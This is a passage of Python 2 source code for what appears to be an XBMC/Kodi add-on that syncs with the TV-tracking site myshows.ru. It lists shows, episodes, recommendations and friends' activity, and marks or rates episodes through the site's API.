__settings__.setSetting('tvdbtop','true')\n", " gotoCheckPoint()\n", " return\n", "\n", " tdata=Data(cookie_auth, 'http://api.myshows.ru/shows/top/'+action+'/')\n", " get_data= tdata.get().lstrip('[{').rstrip('}]').split('},{')\n", " syncshows=False\n", " if useTVDBtop:\n", " try: syncshows=SyncXBMC()\n", " except: pass\n", "\n", " for data in get_data:\n", " jdata=json.loads('{'+data+'}')\n", " if ruName=='true' and jdata['ruTitle']:\n", " title=jdata['ruTitle'].encode('utf-8')\n", " else:\n", " title=jdata['title']\n", "\n", " info={'title': title,'year': jdata['year'],'tvshowtitle': jdata['title'],\n", " 'status': jdata['status'],'votes': jdata['voted'],'rating': float(jdata['rating'])*2}\n", " item = xbmcgui.ListItem(str(jdata['place'])+'. '+title+' ('+str(jdata['year'])+')', iconImage='DefaultFolder.png', thumbnailImage=str(jdata['image']))\n", " if syncshows: item=syncshows.shows(title, item, info)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", "\n", " stringdata={\"showId\":int(jdata['id']), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(jdata['id']) + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Recommendations(action):\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " saveCheckPoint()\n", " result=[]\n", " login=__settings__.getSetting(\"username\")\n", " if action=='xbmcfriends':\n", " action='friends'\n", " login='xbmchub'\n", " if action=='recomm':\n", " orig_before=u' <p class=\"description\">'\n", " orig_after=u'</p> </th>'\n", " orig_false=u' </th>'\n", " subject=Data(cookie_auth, 
'http://myshows.ru/profile/recommendations/').get().decode('utf-8')\n", " reobj = re.compile(u'<span class=\"status .+?\"><a href=.+?/view/(\\d+?)/\">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style=\"width: (\\d+)%\"></div>.+?<td>(\\d+)%</td>', re.DOTALL | re.MULTILINE)\n", " result = reobj.findall(subject)\n", " elif action=='friends':\n", " orig_before=u'\t\t\t\t\t\t\t<p class=\"description\">'\n", " orig_after=u'</p>\t\t\t\t\t\t</th>'\n", " orig_false=u' </th>'\n", " subject=Data(cookie_auth, 'http://myshows.ru/'+login+'/friends/rating').get().decode('utf-8')\n", " reobj = re.compile(u'<span class=\"status .+?\"><a href=.+?/view/(\\d+?)/\">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style=\"width: (\\d+)%\"></div>.+?<td width=\"\\d+?%\">(\\d+)</td>.+?<td width=\"\\d+?%\">([0-9.]+)%</td>', re.DOTALL | re.MULTILINE)\n", " result = reobj.findall(subject)\n", " j=0\n", " for i in result:\n", " j+=1\n", " if action=='recomm':\n", " showId,title,origtitle,rating,recomm=i[0],i[1],i[2],i[3],i[4]\n", " listtitle=str(j)+'. ['+recomm+'%] '+title\n", " elif action=='friends':\n", " showId,title,origtitle,rating,friends,recomm=i[0],i[1],i[2],i[3],i[4],i[5]\n", " listtitle=str(j)+'. 
['+friends+']['+recomm+'%] '+title\n", " if origtitle==orig_false: origtitle=title.encode('utf-8')\n", " else: origtitle=origtitle.replace(orig_before,'').replace(orig_after,'')\n", " title=title.encode('utf-8')\n", " if ruName!='true': title=origtitle\n", "\n", " rating=float(rating)/10\n", " item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',)\n", " info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':''}\n", " if syncshows: item=syncshows.shows(title, item, info)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", " stringdata={\"showId\":int(showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def EpisodeList(action):\n", " saveCheckPoint()\n", " item = xbmcgui.ListItem(' '+__language__(30114), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'Title': __language__(30114), 'date': today_str()} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str(sys.argv[0] + '?action='+action+'&sort=shows&mode='+str(mode)), listitem=item, isFolder=True)\n", "\n", " show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/')\n", " data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/')\n", " show_jdata = json.loads(show_data.get())\n", " jdata = json.loads(data.get())\n", "\n", " for id in jdata:\n", " str_showId=str(jdata[id][\"showId\"])\n", " try:\n", " show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 
'http://api.myshows.ru/profile/shows/').get())\n", " try:show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())\n", " show_title=show_direct['title']\n", " show_jdata[str_showId]=show_direct\n", " if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle']\n", " pre=prefix(id=int(id))\n", " left=dates_diff(str(jdata[id][\"airDate\"]), 'today')\n", " title=pre+(__language__(30113) % (int_xx(str(jdata[id]['seasonNumber'])), int_xx(str(jdata[id]['episodeNumber'])), left, show_title, jdata[id]['title']))\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=show_jdata[ str_showId ]['image'] )\n", " item.setInfo( type='Video', infoLabels={'title': title,\n", " 'episode': jdata[id]['episodeNumber'],\n", " 'season': jdata[id]['seasonNumber'],\n", " 'date': jdata[id]['airDate'] } )\n", " stringdata={\"showId\":int(str_showId), \"episodeId\":int(jdata[id]['episodeNumber']), \"id\":int(id), \"seasonId\":int(jdata[id]['seasonNumber'])}\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str_showId + '&id='+str(id)+'&seasonNumber=' + str(jdata[id]['seasonNumber']) + '&playcount=0&mode=30'\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(data.url))\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url+refresh_url, listitem=item, isFolder=False)\n", "\n", "def ShowList(action):\n", " show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/')\n", " data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/')\n", " show_jdata = json.loads(show_data.get())\n", " jdata = json.loads(data.get())\n", "\n", " num_eps=dict()\n", " last_date=dict()\n", " first_date=dict()\n", " shows=dict()\n", " images=dict()\n", "\n", " for id in jdata:\n", " 
str_showId=str(jdata[id][\"showId\"])\n", " str_date=str(jdata[id][\"airDate\"])\n", " try:\n", " show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 'http://api.myshows.ru/profile/shows/').get())\n", " try:show_title=show_jdata[str_showId]['title']\n", " except KeyError:\n", " show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())\n", " show_title=show_direct['title']\n", " show_jdata[str_showId]=show_direct\n", " if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle']\n", " if num_eps.get(str_showId)==None:\n", " num_eps[str_showId]=1\n", " shows[str_showId]=show_title.encode('utf-8')\n", " last_date[str_showId]=str_date\n", " first_date[str_showId]=str_date\n", " images[str_showId]=show_jdata[str_showId]['image']\n", " else: num_eps[str_showId]=int(num_eps[str_showId])+1\n", "\n", " if fdate_bigger_ldate(last_date[str_showId],str_date)==False: last_date[str_showId]=str_date\n", " elif fdate_bigger_ldate(first_date[str_showId],str_date)==True: first_date[str_showId]=str_date\n", "\n", " for str_showId in num_eps:\n", " if num_eps[str_showId]==1:\n", " title=__language__(30115).encode('utf-8') % (last_date[str_showId], shows[str_showId], num_eps[str_showId])\n", " else:\n", " title=__language__(30116).encode('utf-8') % (last_date[str_showId], first_date[str_showId], shows[str_showId], num_eps[str_showId])\n", "\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(images[str_showId]) )\n", " item.setInfo( type='Video', infoLabels={'Title': shows[str_showId], 'date': str(last_date[str_showId]) } )\n", " stringdata={\"showId\":int(str_showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus(str(show_data.url))\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + 
str_showId + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def FriendsNews():\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " i=[(__language__(30158),''),(__language__(30157),'xbmchub')]\n", " if action==None:\n", " first=1\n", " cookie_auth=__settings__.getSetting(\"cookie_auth\")\n", " else:\n", " first=0\n", " cookie_auth=auth_xbmc()\n", " item = xbmcgui.ListItem(TextBB(i[first][0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='')\n", " item.setInfo( type='Video', infoLabels={'title': unicode(i[0])} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=40' %(sys.argv[0], i[first][1])), listitem=item, isFolder=True)\n", " data=Data(cookie_auth, 'http://api.myshows.ru/profile/').get()\n", " jfr, avatars=json.loads(data), {}\n", " for i in jfr[\"friends\"]:\n", " avatars[i[\"login\"]]=i[\"avatar\"]+\"0\"\n", " get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/')\n", " jx=json.loads(get_data)\n", " for u in jx:\n", " for jdata in jx[u]:\n", " if jdata['gender']=='m': title_str=__language__(30117)\n", " else: title_str=__language__(30118)\n", " if jdata['episodeId']>0:\n", " title=__language__(30119) % (jdata['login'], title_str, str(jdata['episode']), jdata['show'])\n", " else:\n", " title=__language__(30120) % (jdata['login'], title_str, str(jdata['episodes']), jdata['show'])\n", " try:item = xbmcgui.ListItem(title, iconImage=avatars[jdata[\"login\"]], thumbnailImage=avatars[jdata[\"login\"]])\n", " except:item = xbmcgui.ListItem(title, iconImage='', thumbnailImage='')\n", " info={'title': jdata['show'],'label': jdata['show'],'tvshowtitle': jdata['show'],'year':''}\n", " if syncshows: item=syncshows.shows(title, item, info, avatar=True)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", " 
refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?showId=' + str(jdata['showId'])+'&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " sys_url=sys.argv[0] + '?action=' + jdata['login'] + '&mode=41'\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", "def Profile(action, sort='profile'):\n", " data= Data(cookie_auth, 'http://api.myshows.ru/profile/'+action).get()\n", " jdata=json.loads(data)\n", "\n", " if sort!='profile':\n", " flist=[]\n", " if sort!='friend':\n", " if sort=='friends':\n", " if 'friends' in jdata:\n", " flist=jdata['friends']\n", " elif sort=='followers':\n", " if 'followers' in jdata:\n", " flist=jdata['followers']\n", " for arr in flist:\n", " if arr['gender']=='m': title_str=__language__(30121)\n", " else: title_str=__language__(30122)\n", " days=arr['wastedTime']/24\n", " title=__language__(30123) % (arr['login'], title_str, str(days), str(arr['wastedTime']))\n", " avatar=arr['avatar']+'0'\n", " item = xbmcgui.ListItem(title, iconImage=avatar, thumbnailImage=avatar)\n", " item.setInfo( type='Video', infoLabels={'Title': title })\n", " sys_url=sys.argv[0] + '?action=' + arr['login'] + '&mode=41&sort=profile'\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", " elif action:\n", " xbmcplugin.setContent(int(sys.argv[1]), 'tvshows')\n", " try: syncshows=SyncXBMC()\n", " except: syncshows=False\n", " orig_before=u' <p class=\"description\">'\n", " orig_after=u'</p> </th>'\n", " orig_false=u' </th>'\n", " subject=Data(cookie_auth, 'http://myshows.ru/'+action+'/wasted').get().decode('utf-8')\n", " reobj = re.compile(r'<span class=\"status .+?\"><a href=\"http://myshows.ru/view/(\\d+)/\">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?.+?<div style=\"width: 
(\\d+)%\"></div>.+?<td>\\d+</td>.+?<td>(\\d+)</td>.+?<td>(.+?)</td>', re.DOTALL | re.MULTILINE)\n", " result = reobj.findall(subject)\n", " result=sorted(result, key=lambda x: x[1])\n", " result=sorted(result, key=lambda x: int(x[3]), reverse=True)\n", " for i in result:\n", " showId,title,origtitle,rating,totalep,epunwatched=i[0],i[1],i[2],i[3],i[4],i[5]\n", " if origtitle==orig_false:\n", " origtitle=title.encode('utf-8')\n", " else:\n", " origtitle=origtitle.replace(orig_before,'').replace(orig_after,'')\n", " #Debug(origtitle)\n", " if ruName!='true': title=origtitle\n", " title=title.encode('utf-8')\n", " rating=float(rating)/10\n", " epunwatched=epunwatched.replace('<span class=\"useless\">','').replace('</span>','')\n", " if int(epunwatched)==0: playcount=1\n", " else: playcount=0\n", " listtitle='[%d] %s' %(int(rating)/2, title)\n", " item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',)\n", " info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':'', 'playcount':playcount, 'episode':int(totalep)}\n", " if syncshows: item=syncshows.shows(title, item, info)\n", " else: item.setInfo( type='Video', infoLabels=info )\n", " stringdata={\"showId\":int(showId), \"seasonId\":None, \"episodeId\":None, \"id\":None}\n", " refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/')\n", " sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20'\n", " item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", " else:\n", "\n", " if action==login:\n", " menu=[(__language__(30154),sys.argv[0] + '?mode=41&sort=friend&action='+login),\n", " (__language__(30124),sys.argv[0] + '?mode=41&sort=friends'),\n", " (__language__(30125),sys.argv[0] + '?mode=41&sort=followers')]\n", " elif sort!='friend':\n", " 
action=unicode(urllib.unquote_plus(action),'utf-8','ignore')\n", " menu=[(__language__(30154), sys.argv[0] + '?action='+action+'&mode=41&sort=friend'),\n", " (__language__(30127) % (action), sys.argv[0] + '?action='+action+'&mode=41&sort=friends'),\n", " (__language__(30126) % (action), sys.argv[0] + '?action='+action+'&mode=41&sort=followers')]\n", " for temmp in menu:\n", " sys_url=temmp[1].encode('utf-8')\n", " title=temmp[0].encode('utf-8')\n", "\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata['avatar']+'0'))\n", " item.setInfo( type='Video', infoLabels={'Title': title} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True)\n", "\n", " if jdata['gender']=='m':\n", " stats=[__language__(30128) % (str(jdata['stats']['watchedDays'])),\n", " __language__(30129) % (str(jdata['stats']['watchedEpisodes'])),\n", " __language__(30130) % (str(jdata['stats']['watchedHours'])),\n", " __language__(30131) % (str(jdata['stats']['remainingEpisodes']))]\n", " else:\n", " stats=[__language__(30132) % (str(jdata['stats']['watchedDays'])),\n", " __language__(30133) % (str(jdata['stats']['watchedEpisodes'])),\n", " __language__(30134) % (str(jdata['stats']['watchedHours'])),\n", " __language__(30135) % (str(jdata['stats']['remainingEpisodes']))]\n", "\n", "\n", " for temmp in stats:\n", " title=temmp.encode('utf-8')\n", " item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata['avatar']+'0'))\n", " item.setInfo( type='Video', infoLabels={'Title': title} )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url='', listitem=item, isFolder=False)\n", "\n", "def Change_Status_Episode(showId, id, action, playcount, refresh_url, selftitle=None):\n", " Debug('[Change_Status_Episode]:'+str((showId, id, action, playcount, refresh_url, selftitle)))\n", " if action==None:\n", " if playcount=='0': action='check'\n", " else: action='uncheck'\n", "\n", " 
status_url='http://api.myshows.ru/profile/episodes/'+action+'/'+str(id)\n", " ok2=Data(cookie_auth, status_url, refresh_url).get()\n", " #Debug('[TEST][Change_Status_Episode]:ok2 '+str(ok2))\n", " if ok2:\n", " showMessage(__language__(30208), status_url.strip('http://api.myshows.ru/profile/episodes/'), 70)\n", " WatchedDB().onaccess()\n", " else:\n", " Debug('[Change_Status_Episode]: Not ok2! Starting offline check and adding!')\n", " if not showId: showId=0\n", " if not selftitle: selftitle=json.dumps({\"myshows_showId\":int(showId),\"myshows_id\":int(id)})\n", " if action=='check':\n", " WatchedDB().check(selftitle)\n", " else:\n", " try:\n", " WatchedDB()._delete(selftitle)\n", " except:\n", " Debug('[Change_Status_Episode] Nothing to delete.'+selftitle)\n", " return False\n", "\n", "def Change_Status_Show(showId, action, refresh_url):\n", " if action=='remove':\n", " dialog = xbmcgui.Dialog()\n", " ret=dialog.yesno(__language__(30209), __language__(30210))\n", " else:\n", " ret=True\n", " if ret:\n", " ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/'+action, refresh_url).get()\n", " if ok:showMessage(__language__(30208), showId+'/'+action)\n", "\n", "def Change_Status_Season(showId, seasonNumber, action, refresh_url):\n", " #showMessage(__language__(30211), __language__(30212))\n", " data= get_url(cookie_auth, 'http://api.myshows.ru/shows/'+showId)\n", " eps_string=''\n", " jdata = json.loads(data)\n", " for id in jdata['episodes']:\n", " sNum=str(jdata['episodes'][id]['seasonNumber'])\n", " if seasonNumber==sNum:\n", " eps_string=eps_string+str(id)+','\n", " ok=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/episodes?'+action+'='+eps_string.rstrip(','), refresh_url).get()\n", " if ok:showMessage(__language__(30208), showId+'/episodes?'+action+'='+eps_string)\n", "\n", "def Rate(showId, id, refresh_url, selftitle=None):\n", " ratewindow=__settings__.getSetting(\"ratewindow\")\n", " rate=['5', '4', '3', '2', '1', 
unicode(__language__(30205))]\n", " if id=='0':\n", " rate_item=__language__(30213)+' '+showId\n", " else:\n", " rate_item=__language__(30214)+' '+id\n", " if ratewindow=='true':\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(__language__(30215) % rate_item, rate)\n", " else:\n", " ret=rateMedia(showId, id, __language__(30215) % rate_item)\n", " if ret:\n", " ret=int(ret)-1\n", " if ret>-1 and ret<5:\n", " if id=='0':\n", " rate_url=('http://api.myshows.ru/profile/shows/'+showId+'/rate/'+rate[ret])\n", " else:\n", " rate_url=('http://api.myshows.ru/profile/episodes/rate/'+rate[ret]+'/'+id)\n", " ok=Data(cookie_auth, rate_url, refresh_url).get()\n", " #Debug('[TEST][Rate]:ok '+str(ok))\n", " if ok:\n", " showMessage(__language__(30208), rate_url.strip('http://api.myshows.ru/profile/'))\n", " WatchedDB().onaccess()\n", " else:\n", " Debug('[Rate]: Not ok! Starting offline check and adding!')\n", " if not selftitle: selftitle=json.dumps({\"myshows_showId\":int(showId),\"myshows_id\":int(id)})\n", " WatchedDB().check(selftitle,int(rate[ret]))\n", " return False\n", " if getSettingAsBool('ratekinopoisk') and id=='0' and ok:\n", " jload=Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId).get()\n", " if jload:\n", " jdata = json.loads(jload)\n", " title=jdata['title'].encode('utf-8')\n", " try: titleAlt=jdata['ruTitle'].encode('utf-8')\n", " except:titleAlt=None\n", " year=jdata['year']\n", " kinopoiskId=jdata['kinopoiskId']\n", " kinorate(title,year,titleAlt,kinopoiskId)\n", " return True\n", "\n", "def FakeRate(title):\n", " if getSettingAsBool(\"scrobrate\"):\n", " ratewindow=__settings__.getSetting(\"ratewindow\")\n", " rate=['5', '4', '3', '2', '1', unicode(__language__(30205))]\n", " rate_item=__language__(30520)\n", " if ratewindow=='true':\n", " dialog = xbmcgui.Dialog()\n", " ret = dialog.select(rate_item, rate)\n", " if ret>-1:\n", " ret=int(ret)+1\n", " else:\n", " rate_item=titlesync(title)\n", " ret=rateMedia(None, None, rate_item)\n", " if 
ret: ret=int(ret)\n", " else:\n", " ret=False\n", " if ret>0 and ret<6 or ret==None and not getSettingAsBool(\"rateandcheck\") or ret==False:\n", " db=WatchedDB()\n", " if ret==None or ret==False: rating=0\n", " else:\n", " rating=int(rate[int(ret)-1])\n", " db.check(title,rating)\n", " return True\n", "\n", "def Favorite(id, refresh_url):\n", " dialog = xbmcgui.Dialog()\n", " items=[__language__(30217), __language__(30218), __language__(30219), __language__(30220), unicode(__language__(30205))]\n", " actions_fi=['favorites', 'favorites', 'ignored', 'ignored', '']\n", " actions_ar=['add', 'remove', 'add', 'remove', '']\n", " ret = dialog.select(__language__(30216) % id, items)\n", " if ret!=items.index(unicode(__language__(30205))):\n", " fav_url=actions_fi[ret]+'/'+actions_ar[ret]+'/'+str(id)\n", " Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+fav_url, refresh_url).get()\n", " showMessage(__language__(30208), fav_url)\n", "\n", "def ContextMenuItems(sys_url, refresh_url, ifstat=None):\n", " myshows_dict=[]\n", " #Debug('[ContextMenuItems] '+unicode(sys.argv))\n", " if mode >= 10 and mode <=19 or mode==100 or sort and mode in (27,28) or mode==41 and sort and action:\n", " menu=[__language__(30227)+'|:|'+sys_url+'4',\n", " __language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url,\n", " __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url,\n", " __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url,\n", " __language__(30315)+'|:|'+sys_url+'5',\n", " __language__(30303)+'|:|'+sys_url+'1&id=0',\n", " __language__(30304)+'|:|'+sys_url+'0&action=remove'+refresh_url,\n", " __language__(30319)+'|:|'+sys_url+'6',]\n", " elif mode==20:\n", " menu=[__language__(30227)+'|:|'+sys_url+'4',\n", " __language__(30311)+'|:|'+sys_url+'9',\n", " __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url,\n", " __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url,\n", " __language__(30319)+'|:|'+sys_url+'6',\n", " 
__language__(30315)+'|:|'+sys_url+'5',\n", " __language__(30310)+'|:|'+sys_url+'201',\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30228)+'|:|'+sys_url+'7',\n", " __language__(30314)+'|:|'+sys_url+'8',]\n", " elif mode==40:\n", " menu=[__language__(30300)+'|:|'+sys_url+'0&action=watching'+refresh_url,\n", " __language__(30301)+'|:|'+sys_url+'0&action=later'+refresh_url,\n", " __language__(30302)+'|:|'+sys_url+'0&action=cancelled'+refresh_url,\n", " __language__(30319)+'|:|'+sys_url+'6']\n", " elif mode==25 or not sort and mode in (27,28):\n", " menu=[__language__(30227)+'|:|'+sys_url+'4',\n", " __language__(30305)+'|:|'+sys_url+'0&action=check'+refresh_url,\n", " __language__(30306)+'|:|'+sys_url+'0&action=uncheck'+refresh_url,\n", " __language__(30317)+'|:|'+sys_url+'2',\n", " __language__(30319)+'|:|'+sys_url+'6',\n", " __language__(30308)+'|:|'+sys_url+'1'+refresh_url,\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30310)+'|:|'+sys_url+'201',\n", " __language__(30228)+'|:|'+sys_url+'200',]\n", " elif mode in (50,) and not sort:\n", " menu=[__language__(30227)+'|:|'+sys_url,\n", " __language__(30310)+'|:|'+sys_url+'1',\n", " __language__(30311)+'|:|'+sys_url+'2',\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30228)+'|:|'+sys_url+'0']\n", " elif mode==50 and sort:\n", " menu=[__language__(30314)+'|:|'+sys_url+'0']\n", " elif mode in (51,):\n", " menu=[]\n", " if ifstat==True: menu.append(__language__(30312)+'|:|'+sys_url+'02')\n", " elif ifstat==False: menu.append(__language__(30313)+'|:|'+sys_url+'01')\n", " menu.extend([__language__(30227)+'|:|'+sys_url,\n", " __language__(30311)+'|:|'+sys_url+'2',\n", " __language__(30318)+'|:|'+sys_url+'71',\n", " __language__(30228)+'|:|'+sys_url+'0'])\n", "\n", " for s in menu: myshows_dict.append([s.split('|:|')[0],'XBMC.RunPlugin('+s.split('|:|')[1]+')'])\n", " return myshows_dict\n", "\n", "class SyncXBMC():\n", " def __init__(self, inner=None, rating=None):\n", " 
self.menu,self.rating,self.title=None,None,title\n", " self.useTVDB=useTVDB\n", " if not inner: self.action=action\n", " else:\n", " self.action='check'\n", " self.title=str(inner)\n", " self.rating=rating\n", " self.jloadshows=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get()\n", " if self.jloadshows:\n", " self.jdatashows = json.loads(self.jloadshows)\n", " else: return\n", " if self.action in ['check']:\n", " self.match=json.loads(self.title)\n", " if self.useTVDB:\n", " from search.scrapers import Scrapers\n", " self.TVDB=Scrapers()\n", " else:\n", " self.menu=self.GetFromXBMC()\n", "\n", " def doaction_simple(self):\n", " id=None\n", " showId=None\n", " if self.match and 'showtitle' in self.match:\n", " showId=self.showtitle2showId()\n", " if self.match and 'date' in self.match and not 'episode' in self.match:\n", " id, self.match['season'],self.match['episode']=date2SE(showId, self.match['date'])\n", " if showId:\n", " if 'season' in self.match and 'episode' in self.match:\n", " Debug('[doaction] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode'])))\n", " id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label'])\n", " Debug('[doaction][showId]: '+str(showId)+' [doaction][id]: '+str(id))\n", " return showId, id\n", "\n", " def doaction(self):\n", " friend_xbmc()\n", " if self.action=='check':\n", " if 'myshows_id' in self.match:\n", " showId, id=self.match['myshows_showId'],self.match['myshows_id']\n", " else:\n", " showId, id=self.doaction_simple()\n", " if __settings__.getSetting(\"label\")=='true' and not id:\n", " if 'file' in self.match: self.match['label']=self.match['file']\n", " idlist=[]\n", " if 'label' in self.match and re.search('.*?\\.avi|mp4|mkv|flv|mov|vob|wmv|ogm|asx|mpg|mpeg|avc|vp3|fli|flc|m4v$', self.match['label'], re.I | re.DOTALL):\n", " 
self.match['label']=self.match['label'].replace(os.path.dirname(self.match['label']),'').encode('utf-8','ignore').lstrip('\\\\/')\n", " self.old_match=self.match\n", " self.match=filename2match(self.match['label'])\n", " showId, id=self.doaction_simple()\n", " if not id:\n", " Debug('[doaction] Trying to find filename on myshows.ru: '+self.old_match['label'])\n", " data=Data(cookie_auth, 'http://api.myshows.ru/shows/search/file/?q='+urllib.quote_plus(self.old_match['label'])).get()\n", " if data:\n", " jdata=json.loads(data)\n", " showId=jdata['show']['id']\n", " ids=jdata['show']['episodes']\n", " for x in ids:\n", " idlist.append(x)\n", " if len(idlist)==1:\n", " id=idlist[0]\n", " #Debug('[doaction] [filename2match] '+unicode(self.match))\n", " if showId or id:\n", " if not id and 'season' in self.match and 'episode' in self.match:\n", " Debug('[doaction2] Getting the id of S%sE%s' % (str(self.match['season']),str(self.match['episode'])))\n", " id=self.getid(showId, self.match['season'],self.match['episode'],self.match['label'])\n", " if id:\n", " if self.rating:\n", " rate_url=('http://api.myshows.ru/profile/episodes/rate/'+str(self.rating)+'/'+str(id))\n", " d=Data(cookie_auth, rate_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get()\n", " #Debug('[TEST][self.rating]: Rate answer %s' % (str(d)))\n", " if self.rating or self.rating==0:\n", " #xbmc.sleep(500)\n", " status_url='http://api.myshows.ru/profile/episodes/check/'+str(id)\n", " c=Data(cookie_auth, status_url, 'http://api.myshows.ru/profile/shows/'+str(showId)+'/').get()\n", " #Debug('[TEST][self.rating]: Check answer %s' % (str(c)))\n", " return 1\n", " rateOK, scrobrate, rateandcheck=False, __settings__.getSetting(\"scrobrate\"), __settings__.getSetting(\"rateandcheck\")\n", " if scrobrate=='true':\n", " #Debug('[TEST][doaction]: Start rateOK')\n", " rateOK=Rate(str(showId), str(id), 'http://api.myshows.ru/profile/shows/'+str(showId)+'/', self.title)\n", " #Debug('[TEST][doaction]: 
